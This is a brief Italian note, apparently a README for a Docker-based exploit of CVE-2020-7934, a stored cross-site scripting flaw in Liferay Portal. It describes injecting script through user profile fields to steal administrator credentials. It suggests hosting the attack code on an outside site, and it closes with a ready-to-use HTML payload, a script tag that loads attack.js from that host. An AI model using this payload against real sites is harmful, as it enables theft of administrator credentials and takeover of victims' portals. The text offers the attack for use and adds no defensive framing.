
Exploit XSS basato su Docker per CVE-2020-7934 che colpisce il portale Liferay. Dimostra un cross-site scripting memorizzato tramite campi del profilo utente per rubare le credenziali dell'amministratore.
è possibile mettere lo script di attacco online (dato il codice js) http://yourjavascript.com/
Il nostro script JS online per l'attacco
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>